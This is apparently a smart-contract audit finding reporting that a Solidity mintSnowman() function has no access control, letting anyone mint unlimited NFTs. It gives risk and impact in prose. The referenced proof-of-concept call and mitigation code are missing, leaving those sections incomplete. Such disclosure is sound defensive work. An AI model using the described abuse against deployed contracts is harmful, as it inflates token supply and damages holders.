Missing Access Control on mintSnowman() Allows Unlimited Unauthorized NFT Minting – High Impact & High Likelihood

Description

• The mintSnowman() function is used to mint one or more ERC721 tokens and assign them to a specified receiver address. Normally, such minting functions are restricted to an authorized party (e.g., contract owner or designated minter) to prevent abuse and ensure fair token distribution.

• However, in the current implementation, the mintSnowman() function is marked external and lacks any access control modifier. As a result, any external account can call this function and mint an unlimited number of NFTs to themselves or any address, leading to potential spam, gas griefing, or dilution of token value.

Risk

Likelihood:

• This will occur as soon as the contract is deployed and any arbitrary user discovers the open mint function on-chain.

• The contract does not validate or restrict the caller, so bots or malicious users can exploit this immediately after deployment.

Impact:

• Unlimited unauthorized NFTs can be minted, undermining the rarity, trust, and design of the NFT drop.

• The token supply can be inflated infinitely, possibly crashing secondary market value and creating spam within wallets or dApps.

Proof of Concept

Assume this contract is deployed at address: 0xABC...

Any user can call this to mint 1000 NFTs to themselves:

There is no check to stop this behavior.

Recommended Mitigation

This ensures that only the contract deployer (or future owner via transferOwnership()) can mint new Snowman NFTs, restoring access control and maintaining supply integrity.